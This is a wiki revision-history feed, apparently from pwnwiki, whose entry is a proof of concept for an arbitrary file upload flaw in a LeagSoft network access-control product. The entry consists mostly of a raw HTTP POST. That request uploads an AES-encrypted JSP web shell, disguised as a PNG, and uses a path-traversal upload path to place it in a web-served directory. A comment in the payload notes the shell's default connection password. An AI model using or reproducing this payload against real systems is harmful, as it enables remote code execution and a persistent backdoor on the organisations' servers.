<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E8%81%AF%E8%BB%9F%E5%87%86%E5%85%A5_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E</id>
	<title>聯軟准入 任意文件上傳漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E8%81%AF%E8%BB%9F%E5%87%86%E5%85%A5_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E8%81%AF%E8%BB%9F%E5%87%86%E5%85%A5_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-21T05:41:00Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E8%81%AF%E8%BB%9F%E5%87%86%E5%85%A5_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=1343&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx ... ...  -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; n...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E8%81%AF%E8%BB%9F%E5%87%86%E5%85%A5_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=1343&amp;oldid=prev"/>
		<updated>2021-04-10T01:48:45Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx ... ...  -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; n...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /uai/download/uploadfileToPath.htm HTTP/1.1&lt;br /&gt;
HOST: xxxxx&lt;br /&gt;
... ...&lt;br /&gt;
&lt;br /&gt;
-----------------------------570xxxxxxxxx6025274xxxxxxxx1&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;input_localfile&amp;quot;; filename=&amp;quot;xxx.jsp&amp;quot;&lt;br /&gt;
Content-Type: image/png&lt;br /&gt;
&lt;br /&gt;
&amp;lt;%@page import=&amp;quot;java.util.*,javax.crypto.*,javax.crypto.spec.*&amp;quot;%&amp;gt;&amp;lt;%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%&amp;gt;&amp;lt;%if (request.getMethod().equals(&amp;quot;POST&amp;quot;)){String k=&amp;quot;e45e329feb5d925b&amp;quot;;/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(&amp;quot;u&amp;quot;,k);Cipher c=Cipher.getInstance(&amp;quot;AES&amp;quot;);c.init(2,new SecretKeySpec(k.getBytes(),&amp;quot;AES&amp;quot;));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-----------------------------570xxxxxxxxx6025274xxxxxxxx1&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;uploadpath&amp;quot;&lt;br /&gt;
&lt;br /&gt;
../webapps/notifymsg/devreport/&lt;br /&gt;
-----------------------------570xxxxxxxxx6025274xxxxxxxx1-- &lt;br /&gt;
​```![](https://www.bylibrary.cn/wp-content/uploads/2020/09/12.png) ![](https://www.bylibrary.cn/wp-content/uploads/2020/09/13.png)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>